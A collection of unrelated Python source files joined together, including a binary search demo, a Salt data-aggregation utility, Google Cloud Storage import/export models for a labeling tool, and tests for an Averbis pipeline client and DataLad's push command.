logging.debug("Saving mapping for source '%s' destination='%s':\n%s" %
(name, dest, pformat(mapping)))
# either given a fully qualified source or just sub-source
try:
subsrc = name.split(".")[1]
except IndexError:
subsrc = name
if dest == "master":
m = self.src_master.find_one({"_id": subsrc}) or {"_id": subsrc}
m["mapping"] = mapping
self.src_master.save(m)
elif dest == "inspect":
m = self.src_dump.find_one({"_id": name})
try:
m["inspect"]["jobs"][subsrc]["inspect"]["results"][
mode] = mapping
self.src_dump.save(m)
except KeyError as e:
raise ValueError(
"Can't save mapping, document doesn't contain expected inspection data"
% e)
else:
raise ValueError("Unknow saving destination: %s" % repr(dest))
def reset(self, name, key="upload", subkey=None):
"""
        Reset, i.e. delete, internal data (src_dump document) for the given source name, key and subkey.
        This method is useful to clean outdated information in the Hub's internal database.
        Ex: key=upload, name=mysource, subkey=mysubsource will delete the entry in the corresponding
        src_dump doc (_id=mysource), under key "upload", for the sub-source named "mysubsource".
        "key" can be either 'download', 'upload' or 'inspect'. Because there's no such notion of subkey for
        dumpers (i.e. 'download'), subkey is optional.
"""
doc = self.src_dump.find_one({"_id": name})
if not doc:
raise ValueError("No such datasource named '%s'" % name)
try:
# nested
if key in ["upload", "inspect"]:
del doc[key]["jobs"][subkey]
# not nested
elif key == "download":
del doc[key]
else:
raise ValueError("key=%s not allowed" % repr(key))
self.src_dump.save(doc)
except KeyError as e:
logging.exception(e)
raise ValueError(
"Can't delete information, not found in document: %s" % e)
|
the-stack_0_6530 | from collections import defaultdict
from copy import deepcopy
import matplotlib.font_manager as fm
import numpy as np
from ...config import SETTINGS
from .plot_tree_graph import plot_tree_graph
class AssemblyGraphMixin:
def plot_assembly_graph(self, ax=None, margin=None, textprops=None, scale=1.0):
"""Plot the complete assembly graph.
Returns
-------
elements_positions, ax
Dictionary of element positions, matplotlib ax.
"""
nodes_dict = {}
levels = defaultdict(lambda *a: [])
edges = []
tree = deepcopy(self.plan)
def rec(node, depth=0):
if node.get("_visited", False):
return
nodes_dict[node.id] = node
node["_visited"] = True
assembly_plan = node.pop("assembly_plan")
levels[depth].append(node.id)
for other in assembly_plan:
edges.append([other.id, node.id])
rec(other, depth + 1)
rec(tree)
levels = [levels[i] for i in range(max(levels) + 1)][::-1]
fontawesome = fm.FontProperties(
fname=SETTINGS["fontawesome-ttf-path"],
size=13 * scale,
family="sans-serif",
)
if textprops is None:
textprops = fm.FontProperties(
fname=SETTINGS["OpenSans-ttf-path"],
size=12 * scale,
family="sans-serif",
)
def draw_node(x, y, node_id, ax):
node = nodes_dict[node_id]
icon = self.sources[node.source]._report_fa_symbol
ax.text(
x,
y,
node_id,
horizontalalignment="left",
verticalalignment="center",
fontproperties=textprops,
)
ax.text(
x - 0.01 * np.sqrt(scale),
y,
icon,
horizontalalignment="right",
verticalalignment="center",
fontproperties=fontawesome,
)
all_elements = sorted(sum(levels, []))
ypos = {
el: 1.0 * (i + 1) / (len(all_elements) + 2)
for i, el in enumerate(all_elements)
}
for el in all_elements:
children = [e2 for (e2, e1) in edges if e1 == el]
if children != []:
ypos[el] = 1.0 * sum(ypos[e] for e in children) / len(children)
xpos = {
el: 1.0 * (1 + x) / (len(levels) + 1)
for x, elements in enumerate(levels)
for el in elements
}
elements_positions = {el: (xpos[el], ypos[el]) for el in all_elements}
return plot_tree_graph(
levels,
edges,
draw_node,
elements_positions=elements_positions,
ax=ax,
edge_left_space=0.06,
edge_right_space=0.03,
margin=margin,
height_factor=0.40,
width_factor=5.5,
scale=scale,
)
|
the-stack_0_6534 | # demo for binary search
import math
def binarysearch(search, sortedlist):
    # classic binary search: keep halving the [left, right] window until the
    # middle element matches, or the window becomes empty
    left = 0
    right = len(sortedlist) - 1
    mid = math.ceil((right + left) / 2)
    while sortedlist[mid] != search:
        if search > sortedlist[mid]:
            left = mid + 1   # search the upper half
        else:
            right = mid - 1  # search the lower half
        if left > right:     # empty window: the value is not in the list
            return -1
        mid = math.ceil((right + left) / 2)
    return mid
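# For comparison, the same lookup can be sketched with the standard library's
# bisect module (illustrative alternative; the demo below keeps using binarysearch):
def binarysearch_bisect(search, sortedlist):
    import bisect
    # bisect_left returns the leftmost insertion point for `search`; it is a
    # hit only if that index is in range and actually holds the value
    i = bisect.bisect_left(sortedlist, search)
    if i < len(sortedlist) and sortedlist[i] == search:
        return i
    return -1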
arr = [1,3,4,5,44,55,66,78,109,1000]
print(arr)
print(binarysearch(int(input("Enter num: ")), arr))
|
the-stack_0_6535 | # -*- coding: utf-8 -*-
'''
salt.utils.aggregation
~~~~~~~~~~~~~~~~~~~~~~
    This library makes it possible to introspect a dataset and aggregate nodes
    when it is instructed to.
    .. note::
        The following examples will be expressed in YAML for convenience's sake:
        - !aggr-scalar will refer to the Scalar python function
        - !aggr-map will refer to the Map python object
        - !aggr-seq will refer to the Sequence python object
    How to instruct merging
    ------------------------
    This yaml document has duplicate keys:
.. code-block:: yaml
foo: !aggr-scalar first
foo: !aggr-scalar second
bar: !aggr-map {first: foo}
bar: !aggr-map {second: bar}
baz: !aggr-scalar 42
    but the tagged values instruct salt that overlapping values can be merged
    together:
.. code-block:: yaml
foo: !aggr-seq [first, second]
bar: !aggr-map {first: foo, second: bar}
baz: !aggr-seq [42]
    Default merge strategy is kept untouched
------------------------------------------
    For example, this yaml document still has duplicate keys, but does not
    instruct aggregation:
.. code-block:: yaml
foo: first
foo: second
bar: {first: foo}
bar: {second: bar}
baz: 42
    So the values found last prevail:
.. code-block:: yaml
foo: second
bar: {second: bar}
baz: 42
Limitations
-----------
Aggregation is permitted between tagged objects that share the same type.
If not, the default merge strategy prevails.
    For example, these documents:
.. code-block:: yaml
foo: {first: value}
foo: !aggr-map {second: value}
bar: !aggr-map {first: value}
bar: 42
baz: !aggr-seq [42]
baz: [fail]
qux: 42
qux: !aggr-scalar fail
are interpreted like this:
.. code-block:: yaml
foo: !aggr-map{second: value}
bar: 42
baz: [fail]
qux: !aggr-seq [fail]
Introspection
-------------
.. todo:: write this part
'''
from __future__ import absolute_import
from copy import copy
import logging
from salt.utils.odict import OrderedDict
__all__ = ['aggregate', 'Aggregate', 'Map', 'Scalar', 'Sequence']
log = logging.getLogger(__name__)
class Aggregate(object):
"""
Aggregation base.
"""
pass
class Map(OrderedDict, Aggregate):
"""
Map aggregation.
"""
pass
class Sequence(list, Aggregate):
"""
Sequence aggregation.
"""
pass
def Scalar(obj):
'''
Shortcut for Sequence creation
>>> Scalar('foo') == Sequence(['foo'])
True
'''
return Sequence([obj])
def levelise(level):
'''
Describe which levels are allowed to do deep merging.
level can be:
True
all levels are True
False
all levels are False
an int
only the first levels are True, the others are False
a sequence
it describes which levels are True, it can be:
* a list of bool and int values
* a string of 0 and 1 characters
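    For example:
    >>> levelise(True)
    (True, True)
    >>> levelise(2)
    (True, 1)
    >>> levelise('01')
    (False, '1')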
'''
if not level: # False, 0, [] ...
return False, False
if level is True:
return True, True
if isinstance(level, int):
return True, level - 1
try: # a sequence
deep, subs = int(level[0]), level[1:]
return bool(deep), subs
except Exception as error:
log.warning(error)
raise
def mark(obj, map_class=Map, sequence_class=Sequence):
'''
Convert obj into an Aggregate instance
'''
if isinstance(obj, Aggregate):
return obj
if isinstance(obj, dict):
return map_class(obj)
if isinstance(obj, (list, tuple, set)):
return sequence_class(obj)
else:
return sequence_class([obj])
def aggregate(obj_a, obj_b, level=False, map_class=Map, sequence_class=Sequence): # NOQA
'''
Merge obj_b into obj_a.
>>> aggregate('first', 'second', True) == ['first', 'second']
True
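    Deep merging turns overlapping scalar values into sequences:
    >>> aggregate({'a': 1}, {'a': 2, 'b': 3}, True) == {'a': [1, 2], 'b': 3}
    True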
'''
deep, subdeep = levelise(level)
if deep:
        obj_a = mark(obj_a, map_class=map_class, sequence_class=sequence_class)
        obj_b = mark(obj_b, map_class=map_class, sequence_class=sequence_class)
if isinstance(obj_a, dict) and isinstance(obj_b, dict):
if isinstance(obj_a, Aggregate) and isinstance(obj_b, Aggregate):
# deep merging is more or less a.update(obj_b)
response = copy(obj_a)
else:
# introspection on obj_b keys only
response = copy(obj_b)
for key, value in obj_b.items():
if key in obj_a:
value = aggregate(obj_a[key], value,
subdeep, map_class, sequence_class)
response[key] = value
return response
    if isinstance(obj_a, Sequence) and isinstance(obj_b, Sequence):
response = obj_a.__class__(obj_a[:])
for value in obj_b:
if value not in obj_a:
response.append(value)
return response
    if isinstance(obj_a, Aggregate) or isinstance(obj_b, Aggregate):
        log.info('only one value marked as aggregate. keep `obj_b` value')
        return obj_b
    log.debug('no value marked as aggregate. keep `obj_b` value')
return obj_b
|
the-stack_0_6539 | import argparse
import os
import time
import typing as t
from random import randint, choice
import pandas as pd
import requests
from gradient_boosting_model.config.core import config
from gradient_boosting_model.processing.data_management import load_dataset
LOCAL_URL = f'http://{os.getenv("DB_HOST", "localhost")}:5000'
HEADERS = {"Accept": "application/json", "Content-Type": "application/json"}
LOT_AREA_MAP = {"min": 1470, "max": 56600}
FIRST_FLR_SF_MAP = {"min": 407, "max": 5095}
SECOND_FLR_SF_MAP = {"min": 0, "max": 1862}
BSMT_QUAL_VALUES = ('Gd', 'TA', 'Ex', 'Fa')
def _generate_random_int(value: int, value_ranges: t.Mapping) -> int:
"""Generate random integer within a min and max range."""
random_value = randint(value_ranges["min"], value_ranges["max"])
return int(random_value)
def _select_random_category(value: str, value_options: t.Sequence) -> str:
"""Select random category given a sequence of categories."""
random_category = choice(value_options)
return random_category
def _prepare_inputs(dataframe: pd.DataFrame) -> pd.DataFrame:
"""Prepare input data by removing key rows with NA values."""
clean_inputs_df = dataframe.dropna(
subset=config.model_config.features + ["KitchenQual", "LotFrontage"]
).copy()
clean_inputs_df.loc[:, "FirstFlrSF"] = clean_inputs_df["FirstFlrSF"].apply(
_generate_random_int, value_ranges=FIRST_FLR_SF_MAP
)
clean_inputs_df.loc[:, "SecondFlrSF"] = clean_inputs_df["SecondFlrSF"].apply(
_generate_random_int, value_ranges=SECOND_FLR_SF_MAP
)
clean_inputs_df.loc[:, "LotArea"] = clean_inputs_df["LotArea"].apply(
_generate_random_int, value_ranges=LOT_AREA_MAP
)
clean_inputs_df.loc[:, "BsmtQual"] = clean_inputs_df["BsmtQual"].apply(
_select_random_category, value_options=BSMT_QUAL_VALUES
)
return clean_inputs_df
def populate_database(n_predictions: int = 500, anomaly: bool = False) -> None:
"""
Manipulate the test data to generate random
predictions and save them to the database.
Before running this script, ensure that the
API and Database docker containers are running.
"""
print(f"Preparing to generate: {n_predictions} predictions.")
# Load the gradient boosting test dataset which
# is included in the model package
test_inputs_df = load_dataset(file_name="test.csv")
clean_inputs_df = _prepare_inputs(dataframe=test_inputs_df)
if len(clean_inputs_df) < n_predictions:
print(
f"If you want {n_predictions} predictions, you need to"
"extend the script to handle more predictions."
)
if anomaly:
# set extremely low values to generate an outlier
n_predictions = 1
clean_inputs_df.loc[:, "FirstFlrSF"] = 1
clean_inputs_df.loc[:, "LotArea"] = 1
clean_inputs_df.loc[:, "OverallQual"] = 1
clean_inputs_df.loc[:, "GrLivArea"] = 1
clean_inputs_df = clean_inputs_df.where(pd.notnull(clean_inputs_df), None)
for index, data in clean_inputs_df.iterrows():
if index > n_predictions:
if anomaly:
print('Created 1 anomaly')
break
response = requests.post(
f"{LOCAL_URL}/v1/predictions/regression",
headers=HEADERS,
json=[data.to_dict()],
)
response.raise_for_status()
if index % 50 == 0:
print(f"{index} predictions complete")
# prevent overloading the server
time.sleep(0.5)
print("Prediction generation complete.")
if __name__ == "__main__":
anomaly = False
parser = argparse.ArgumentParser(
description='Send random requests to House Price API.')
parser.add_argument('--anomaly', help="generate unusual inputs")
args = parser.parse_args()
if args.anomaly:
print("Generating unusual inputs")
anomaly = True
populate_database(n_predictions=500, anomaly=anomaly)
|
the-stack_0_6540 | """This file and its contents are licensed under the Apache License 2.0. Please see the included NOTICE for copyright information and LICENSE for a copy of the license.
"""
import logging
import json
import socket
import re
import google.auth
from google.auth import compute_engine
from google.cloud import storage as google_storage
from google.auth.transport import requests
from urllib.parse import urlparse
from datetime import datetime, timedelta
from django.db import models, transaction
from django.utils.translation import gettext_lazy as _
from django.conf import settings
from django.dispatch import receiver
from django.db.models.signals import post_save
from io_storages.utils import get_uri_via_regex
from io_storages.base_models import ImportStorage, ImportStorageLink, ExportStorage, ExportStorageLink
from io_storages.serializers import StorageAnnotationSerializer
from tasks.models import Annotation
logger = logging.getLogger(__name__)
url_scheme = 'gs'
class GCSStorageMixin(models.Model):
bucket = models.TextField(
_('bucket'), null=True, blank=True,
help_text='GCS bucket name')
prefix = models.TextField(
_('prefix'), null=True, blank=True,
help_text='GCS bucket prefix')
regex_filter = models.TextField(
_('regex_filter'), null=True, blank=True,
help_text='Cloud storage regex for filtering objects')
use_blob_urls = models.BooleanField(
_('use_blob_urls'), default=False,
help_text='Interpret objects as BLOBs and generate URLs')
def get_client(self):
return google_storage.Client()
def get_bucket(self, client=None, bucket_name=None):
if not client:
client = self.get_client()
return client.get_bucket(bucket_name or self.bucket)
class GCSImportStorage(ImportStorage, GCSStorageMixin):
presign = models.BooleanField(
_('presign'), default=True,
help_text='Generate presigned URLs')
presign_ttl = models.PositiveSmallIntegerField(
_('presign_ttl'), default=1,
help_text='Presigned URLs TTL (in minutes)'
)
def iterkeys(self):
bucket = self.get_bucket()
files = bucket.list_blobs(prefix=self.prefix)
prefix = str(self.prefix) if self.prefix else ''
regex = re.compile(str(self.regex_filter)) if self.regex_filter else None
for file in files:
if file.name == (prefix.rstrip('/') + '/'):
continue
# check regex pattern filter
if regex and not regex.match(file.name):
logger.debug(file.name + ' is skipped by regex filter')
continue
yield file.name
def get_data(self, key):
if self.use_blob_urls:
return {settings.DATA_UNDEFINED_NAME: f'{url_scheme}://{self.bucket}/{key}'}
bucket = self.get_bucket()
blob = bucket.blob(key)
blob_str = blob.download_as_string()
value = json.loads(blob_str)
if not isinstance(value, dict):
raise ValueError(f"Error on key {key}: For {self.__class__.__name__} your JSON file must be a dictionary with one task.") # noqa
return value
@classmethod
def is_gce_instance(cls):
"""Check if it's GCE instance via DNS lookup to metadata server"""
try:
socket.getaddrinfo('metadata.google.internal', 80)
except socket.gaierror:
return False
return True
def resolve_gs(self, url, **kwargs):
r = urlparse(url, allow_fragments=False)
bucket_name = r.netloc
key = r.path.lstrip('/')
if self.is_gce_instance():
logger.debug('Generate signed URL for GCE instance')
return self.python_cloud_function_get_signed_url(bucket_name, key)
else:
logger.debug('Generate signed URL for local instance')
return self.generate_download_signed_url_v4(bucket_name, key)
def generate_download_signed_url_v4(self, bucket_name, blob_name):
"""Generates a v4 signed URL for downloading a blob.
Note that this method requires a service account key file. You can not use
this if you are using Application Default Credentials from Google Compute
Engine or from the Google Cloud SDK.
"""
# bucket_name = 'your-bucket-name'
# blob_name = 'your-object-name'
client = self.get_client()
bucket = self.get_bucket(client, bucket_name)
blob = bucket.blob(blob_name)
url = blob.generate_signed_url(
version="v4",
# This URL is valid for 15 minutes
expiration=timedelta(minutes=self.presign_ttl),
# Allow GET requests using this URL.
method="GET",
)
logger.debug('Generated GCS signed url: ' + url)
return url
def python_cloud_function_get_signed_url(self, bucket_name, blob_name):
# https://gist.github.com/jezhumble/91051485db4462add82045ef9ac2a0ec
# Copyright 2019 Google LLC.
# SPDX-License-Identifier: Apache-2.0
# This snippet shows you how to use Blob.generate_signed_url() from within compute engine / cloud functions
# as described here: https://cloud.google.com/functions/docs/writing/http#uploading_files_via_cloud_storage
# (without needing access to a private key)
# Note: as described in that page, you need to run your function with a service account
# with the permission roles/iam.serviceAccountTokenCreator
auth_request = requests.Request()
credentials, project = google.auth.default()
storage_client = google_storage.Client(project, credentials)
data_bucket = storage_client.lookup_bucket(bucket_name)
signed_blob_path = data_bucket.blob(blob_name)
expires_at_ms = datetime.now() + timedelta(minutes=self.presign_ttl)
# This next line is the trick!
signing_credentials = compute_engine.IDTokenCredentials(auth_request, "",
service_account_email=None)
signed_url = signed_blob_path.generate_signed_url(expires_at_ms, credentials=signing_credentials, version="v4")
return signed_url
def resolve_uri(self, data):
uri, storage = get_uri_via_regex(data, prefixes=(url_scheme,))
if not storage:
return
logger.debug("Found matching storage uri in task data value: {uri}".format(uri=uri))
resolved_uri = self.resolve_gs(uri)
return data.replace(uri, resolved_uri)
def scan_and_create_links(self):
return self._scan_and_create_links(GCSImportStorageLink)
class GCSExportStorage(ExportStorage, GCSStorageMixin):
def save_annotation(self, annotation):
bucket = self.get_bucket()
logger.debug(f'Creating new object on {self.__class__.__name__} Storage {self} for annotation {annotation}')
ser_annotation = self._get_serialized_data(annotation)
with transaction.atomic():
# Create export storage link
link = GCSExportStorageLink.create(annotation, self)
key = str(self.prefix) + '/' + link.key if self.prefix else link.key
try:
blob = bucket.blob(key)
blob.upload_from_string(json.dumps(ser_annotation))
except Exception as exc:
logger.error(f"Can't export annotation {annotation} to GCS storage {self}. Reason: {exc}", exc_info=True)
@receiver(post_save, sender=Annotation)
def export_annotation_to_gcs_storages(sender, instance, **kwargs):
project = instance.task.project
if hasattr(project, 'io_storages_gcsexportstorages'):
for storage in project.io_storages_gcsexportstorages.all():
logger.debug(f'Export {instance} to GCS storage {storage}')
storage.save_annotation(instance)
class GCSImportStorageLink(ImportStorageLink):
storage = models.ForeignKey(GCSImportStorage, on_delete=models.CASCADE, related_name='links')
class GCSExportStorageLink(ExportStorageLink):
storage = models.ForeignKey(GCSExportStorage, on_delete=models.CASCADE, related_name='links')
|
the-stack_0_6542 | #
# Copyright (c) 2020 Averbis GmbH.
#
# This file is part of Averbis Python API.
# See https://www.averbis.com for further info.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import logging
import os
from pathlib import Path
import pytest
import time
from averbis import Client, Project, Pipeline
from averbis.core import OperationTimeoutError
URL_BASE = "http://localhost:8080"
API_BASE = URL_BASE + "/rest/v1"
logging.basicConfig(level=logging.INFO)
@pytest.fixture
def client() -> Client:
return Client(URL_BASE)
@pytest.fixture
def pipeline_endpoint_behavior_mock():
return PipelineEndpointMock()
@pytest.fixture(autouse=True)
def pipeline_requests_mock(pipeline_endpoint_behavior_mock, requests_mock):
requests_mock.get(
f"{API_BASE}/textanalysis/projects/LoadTesting/pipelines/discharge",
headers={"Content-Type": "application/json"},
json=pipeline_endpoint_behavior_mock.info_callback,
)
requests_mock.put(
f"{API_BASE}/textanalysis/projects/LoadTesting/pipelines/discharge/start",
headers={"Content-Type": "application/json"},
json=pipeline_endpoint_behavior_mock.start_callback,
)
requests_mock.put(
f"{API_BASE}/textanalysis/projects/LoadTesting/pipelines/discharge/stop",
headers={"Content-Type": "application/json"},
json=pipeline_endpoint_behavior_mock.stop_callback,
)
@pytest.fixture()
def pipeline_analyse_text_mock(requests_mock):
requests_mock.get(
f"{API_BASE}/textanalysis/projects/LoadTesting/pipelines/discharge/configuration",
headers={"Content-Type": "application/json"},
json={
"payload": {"analysisEnginePoolSize": 4},
"errorMessages": [],
},
)
def callback(request, context):
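        # Mock analyseText response: echo the posted text back as a single
        # uima.tcas.DocumentAnnotation covering the whole document.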
doc_text = request.text.read().decode("utf-8")
return {
"payload": [
{
"begin": 0,
"end": len(doc_text),
"type": "uima.tcas.DocumentAnnotation",
"coveredText": doc_text
# ... truncated ...
},
],
"errorMessages": [],
}
requests_mock.post(
f"{API_BASE}/textanalysis/projects/LoadTesting/pipelines/discharge/analyseText",
headers={"Content-Type": "application/json"},
json=callback,
)
def test_ensure_started(client, pipeline_endpoint_behavior_mock):
pipeline_endpoint_behavior_mock.set_state(Pipeline.STATE_STOPPED)
pipeline = client.get_project("LoadTesting").get_pipeline("discharge")
pipeline.pipeline_state_change_timeout = 3
pipeline.pipeline_state_poll_interval = 1
assert pipeline.is_started() is False
pipeline.ensure_started()
assert pipeline.is_started() is True
def test_ensure_stopped(client, pipeline_endpoint_behavior_mock):
pipeline_endpoint_behavior_mock.set_state(Pipeline.STATE_STARTED)
pipeline = client.get_project("LoadTesting").get_pipeline("discharge")
pipeline.pipeline_state_change_timeout = 3
pipeline.pipeline_state_poll_interval = 1
assert pipeline.is_started() is True
pipeline.ensure_stopped()
assert pipeline.is_started() is False
def test_ensure_started_timeout(client, pipeline_endpoint_behavior_mock):
pipeline_endpoint_behavior_mock.set_state(Pipeline.STATE_STOPPED, locked=True)
pipeline = client.get_project("LoadTesting").get_pipeline("discharge")
pipeline.pipeline_state_change_timeout = 2
pipeline.pipeline_state_poll_interval = 1
assert pipeline.is_started() is False
with pytest.raises(OperationTimeoutError):
pipeline.ensure_started()
def test_ensure_started_failure_to_start(client, pipeline_endpoint_behavior_mock):
error_message = "Starting failed: org.apache.uima.ruta.extensions.RutaParseRuntimeException"
pipeline_endpoint_behavior_mock.set_state(
Pipeline.STATE_STOPPED,
locked=True,
pipeline_state_message=error_message,
)
pipeline = client.get_project("LoadTesting").get_pipeline("discharge")
pipeline.pipeline_state_change_timeout = 2
pipeline.pipeline_state_poll_interval = 1
assert pipeline.is_started() is False
with pytest.raises(Exception) as ex:
pipeline.ensure_started()
assert error_message in str(ex.value)
class PipelineEndpointMock:
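    """Mock of the pipeline REST endpoint behavior.
    Start/stop requests only record the requested state; info_callback reports
    the requested state as the actual state once ``change_state_after`` seconds
    have passed (unless the state is locked), simulating an asynchronous
    pipeline state change.
    """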
def __init__(self):
self.change_state_after = 1
self.last_state_change_request = time.time()
self.state = Pipeline.STATE_STOPPED
self.pipeline_state_message = None
self.requested_state = Pipeline.STATE_STOPPED
self.requested_state_pipeline_state_message = None
self.state_locked = False
def set_state(
self, state: str, locked: bool = False, pipeline_state_message: str = None
) -> None:
self.state = state
self.requested_state = state
self.state_locked = locked
self.requested_state_pipeline_state_message = pipeline_state_message
def info_callback(self, request, context):
if (
not self.state_locked
and self.last_state_change_request + self.change_state_after < time.time()
):
self.state = self.requested_state
if self.last_state_change_request + self.change_state_after < time.time():
self.pipeline_state_message = self.requested_state_pipeline_state_message
return {
"payload": {
"id": 94034,
"name": "discharge",
"description": None,
"pipelineState": self.state,
"pipelineStateMessage": self.pipeline_state_message,
"preconfigured": True,
"scaleOuted": False,
},
"errorMessages": [],
}
def start_callback(self, request, context):
self.last_state_change_request = time.time()
self.requested_state = Pipeline.STATE_STARTED
return {"payload": {}, "errorMessages": []}
def stop_callback(self, request, context):
self.last_state_change_request = time.time()
self.requested_state = Pipeline.STATE_STOPPED
return {"payload": {}, "errorMessages": []}
def test_analyse_texts_with_paths(client, pipeline_analyse_text_mock):
pipeline = Pipeline(Project(client, "LoadTesting"), "discharge")
results = pipeline.analyse_texts(Path("tests/resources/texts").glob("*.txt"))
expected_results = []
for input_file in Path("tests/resources/texts").glob("*.txt"):
with open(input_file, "r", encoding="UTF-8") as input_io:
expected_results.append(
{"source": str(input_file).replace(os.sep, "/"), "text": input_io.read()}
)
assert [
{"source": result.source.replace(os.sep, "/"), "text": result.data[0]["coveredText"]}
for result in sorted(results, key=lambda x: x.source)
] == sorted(expected_results, key=lambda x: x["source"])
def test_analyse_texts_with_files(client, pipeline_analyse_text_mock):
pipeline = Pipeline(Project(client, "LoadTesting"), "discharge")
with open("tests/resources/texts/text1.txt", "rb") as file1, open(
"tests/resources/texts/text2.txt", "rb"
) as file2:
results = pipeline.analyse_texts([file1, file2])
sources = [result.source.replace(os.sep, "/") for result in results]
assert sources == ["tests/resources/texts/text1.txt", "tests/resources/texts/text2.txt"]
|
the-stack_0_6544 | # -*- coding: utf-8 -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Test push
"""
import os
import logging
from datalad.distribution.dataset import Dataset
from datalad.support.exceptions import (
IncompleteResultsError,
InsufficientArgumentsError,
)
from datalad.tests.utils import (
assert_false,
assert_in,
assert_in_results,
assert_not_in,
assert_not_in_results,
assert_raises,
assert_repo_status,
assert_result_count,
assert_status,
DEFAULT_BRANCH,
DEFAULT_REMOTE,
eq_,
known_failure_githubci_osx,
known_failure_githubci_win,
neq_,
ok_,
ok_file_has_content,
serve_path_via_http,
skip_if_adjusted_branch,
skip_if_on_windows,
skip_ssh,
slow,
swallow_logs,
with_tempfile,
with_tree,
SkipTest,
)
from datalad.utils import (
Path,
chpwd,
path_startswith,
swallow_outputs,
)
from datalad.support.gitrepo import GitRepo
from datalad.support.annexrepo import AnnexRepo
from datalad.core.distributed.clone import Clone
from datalad.core.distributed.push import Push
from datalad.support.network import get_local_file_url
DEFAULT_REFSPEC = "refs/heads/{0}:refs/heads/{0}".format(DEFAULT_BRANCH)
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
def test_invalid_call(origin, tdir):
ds = Dataset(origin).create()
# no target
assert_status('impossible', ds.push(on_failure='ignore'))
# no dataset
with chpwd(tdir):
assert_raises(InsufficientArgumentsError, Push.__call__)
# dataset, but outside path
assert_raises(IncompleteResultsError, ds.push, path=tdir)
# given a path constraint that doesn't match anything, will cause
# nothing to be done
assert_status('notneeded', ds.push(path=ds.pathobj / 'nothere'))
# unavailable subdataset
dummy_sub = ds.create('sub')
dummy_sub.uninstall()
assert_in('sub', ds.subdatasets(fulfilled=False, result_xfm='relpaths'))
# now an explicit call to publish the unavailable subdataset
assert_raises(ValueError, ds.push, 'sub')
target = mk_push_target(ds, 'target', tdir, annex=True)
# revision that doesn't exist
assert_raises(
ValueError,
ds.push, to='target', since='09320957509720437523')
# If a publish() user accidentally passes since='', which push() spells as
# since='^', the call is aborted.
assert_raises(
ValueError,
ds.push, to='target', since='')
def mk_push_target(ds, name, path, annex=True, bare=True):
# life could be simple, but nothing is simple on windows
#src.create_sibling(dst_path, name='target')
if annex:
if bare:
target = GitRepo(path=path, bare=True, create=True)
# cannot use call_annex()
target.call_git(['annex', 'init'])
else:
target = AnnexRepo(path, init=True, create=True)
if not target.is_managed_branch():
# for managed branches we need more fireworks->below
target.config.set(
'receive.denyCurrentBranch', 'updateInstead',
where='local')
else:
target = GitRepo(path=path, bare=bare, create=True)
ds.siblings('add', name=name, url=path, result_renderer=None)
if annex and not bare and target.is_managed_branch():
# maximum complication
# the target repo already has a commit that is unrelated
# to the source repo, because it has built a reference
# commit for the managed branch.
# the only sane approach is to let git-annex establish a shared
# history
ds.repo.call_annex(['sync'])
ds.repo.call_annex(['sync', '--cleanup'])
return target
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
def check_push(annex, src_path, dst_path):
# prepare src
src = Dataset(src_path).create(annex=annex)
src_repo = src.repo
# push should not add branches to the local dataset
orig_branches = src_repo.get_branches()
assert_not_in('synced/' + DEFAULT_BRANCH, orig_branches)
res = src.push(on_failure='ignore')
assert_result_count(res, 1)
assert_in_results(
res, status='impossible',
message='No push target given, and none could be auto-detected, '
'please specify via --to')
eq_(orig_branches, src_repo.get_branches())
# target sibling
target = mk_push_target(src, 'target', dst_path, annex=annex)
eq_(orig_branches, src_repo.get_branches())
res = src.push(to="target")
eq_(orig_branches, src_repo.get_branches())
assert_result_count(res, 2 if annex else 1)
assert_in_results(
res,
action='publish', status='ok', target='target',
refspec=DEFAULT_REFSPEC,
operations=['new-branch'])
assert_repo_status(src_repo, annex=annex)
eq_(list(target.get_branch_commits_(DEFAULT_BRANCH)),
list(src_repo.get_branch_commits_(DEFAULT_BRANCH)))
# configure a default merge/upstream target
src.config.set('branch.{}.remote'.format(DEFAULT_BRANCH),
'target', where='local')
src.config.set('branch.{}.merge'.format(DEFAULT_BRANCH),
DEFAULT_BRANCH, where='local')
# don't fail when doing it again, no explicit target specification
# needed anymore
res = src.push()
eq_(orig_branches, src_repo.get_branches())
# and nothing is pushed
assert_status('notneeded', res)
assert_repo_status(src_repo, annex=annex)
eq_(list(target.get_branch_commits_(DEFAULT_BRANCH)),
list(src_repo.get_branch_commits_(DEFAULT_BRANCH)))
# some modification:
(src.pathobj / 'test_mod_file').write_text("Some additional stuff.")
src.save(to_git=True, message="Modified.")
(src.pathobj / 'test_mod_annex_file').write_text("Heavy stuff.")
src.save(to_git=not annex, message="Modified again.")
assert_repo_status(src_repo, annex=annex)
    # we could say since='HEAD~2' to make things fast, or we are lazy
    # and say since='^' to indicate the state of the tracking remote,
    # which is the same, because we made two commits since the last push.
res = src.push(to='target', since="^", jobs=2)
assert_in_results(
res,
action='publish', status='ok', target='target',
refspec=DEFAULT_REFSPEC,
# we get to see what happened
operations=['fast-forward'])
if annex:
# we got to see the copy result for the annexed files
assert_in_results(
res,
action='copy',
status='ok',
path=str(src.pathobj / 'test_mod_annex_file'))
# we published, so we can drop and reobtain
ok_(src_repo.file_has_content('test_mod_annex_file'))
src_repo.drop('test_mod_annex_file')
ok_(not src_repo.file_has_content('test_mod_annex_file'))
src_repo.get('test_mod_annex_file')
ok_(src_repo.file_has_content('test_mod_annex_file'))
ok_file_has_content(
src_repo.pathobj / 'test_mod_annex_file',
'Heavy stuff.')
eq_(list(target.get_branch_commits_(DEFAULT_BRANCH)),
list(src_repo.get_branch_commits_(DEFAULT_BRANCH)))
if not (annex and src_repo.is_managed_branch()):
# the following doesn't make sense in managed branches, because
# a commit that could be amended is no longer the last commit
# of a branch after a sync has happened (which did happen
        # during the last push above)
# amend and change commit msg in order to test for force push:
src_repo.commit("amended", options=['--amend'])
# push should be rejected (non-fast-forward):
res = src.push(to='target', since='HEAD~2', on_failure='ignore')
# fails before even touching the annex branch
